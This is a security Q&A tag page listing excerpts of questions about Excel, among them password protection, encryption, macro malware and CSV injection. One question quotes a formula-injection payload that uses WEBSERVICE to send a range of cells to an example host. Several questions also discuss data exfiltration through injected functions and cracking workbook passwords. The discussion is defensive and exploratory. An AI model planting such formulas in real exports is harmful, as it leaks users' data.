A spreadsheet program that is part of Microsoft Office. Security issues can involve e.g. macros and code execution in formulas. See also [office].
Questions tagged [excel]
10 questions
29
votes
7 answers
Is it safe to store account credentials in an Excel sheet protected with a password?
Basically the title. For example, how bad is it to store passwords in an Excel sheet protected with a password, instead of storing passwords in Keypass or something else like Zoho Vault? Of course, this sheet would be in a safe place as well:…
Harry
- 393
- 2
- 5
9
votes
2 answers
Does "=cmd" CSV injection still exist in 2020?
I'm currently pentesting a web application on which a user can generate a CSV. I managed to exfiltrate data via CSV injection using a payload such as:
=WEBSERVICE(CONCAT("http://example.com/", CONCAT(A1:A50))
I am now trying to create a "more…
Scaum
- 271
- 2
- 7
6
votes
1 answer
External command execution in Excel formulas
It's known that MS Excel functionality of external references will allow executing arbitrary commands from its formulas with appropriate security warnings and confirmation required from the user.
E.g. having a cell in excel sheet (or csv file opened…
Peteris
- 8,369
- 1
- 26
- 35
6
votes
2 answers
Excel 2007 Encryption Strength
With a strong password of 10+ characters, mixed case, etc... is the encryption of an Excel 2007 document secure enough to create reasonably strong defense against a brute force attack?
What encryption method does Excel 2007 employ?
v15
- 1,741
- 4
- 16
- 18
4
votes
1 answer
Exfiltrate data by injecting functions in Excel 2007 file rendered with PHP
I need to extract data from inside an Excel fille using Excel 2007 functions.
The concept is somewhat related to stored XSS type of data exfiltration only that I need to use Excel 2007 functions (which I managed to inject in the file cells) in…
Lucian Nitescu
- 1,802
- 1
- 13
- 27
3
votes
0 answers
How to "unprotect" malicious workbook without knowing password
Right now I'm looking at an office document (most likely rtf based on it exploiting equation editor) that opens just fine when you double click it, but on further examination in a hex editor and in entropy analysis (7.9) is technically encrypted,…
solumnant
- 133
- 10
2
votes
0 answers
Opened compromised Excel file - am I safe?
Long story short, got duped into opening an XLSM in Excel, with macros being enabled. Realised instantly.
Digged into the Excel structure, found the following (extremely obfuscated)…
user275197
- 21
- 1
2
votes
1 answer
Crack windows excel password
I have many password protected microsoft excel worksheet and I need to be able to edit it. I have forgotten the password, and I know that I can edit the file and take out the password check, but I have quite a few worksheets I would have to do this…
Ethan
- 21
- 2
1
vote
1 answer
Does malicious MS Office xlsb file with macros posses risk to OpenOffice?
I opened malicious MS Office xlsb file with OpenOffice by huge mistake. I am wondering does it possess any risk? From what I am aware Excel macros are not compatible with OpenOffice. So I should be fine?
user1324762
- 111
- 2
0
votes
1 answer
Can a text file disguised as .xlsm be malicious?
A hour ago we receive a suspicious mail targeting some of our mailing lists. It contains a .zip file, itself containing a .xlsm file.
This .xlsm file appears to be recognized as an ASCII text file from the file utility and olevba:
olevba 0.56.1.dev2…
Sumak
- 101
- 1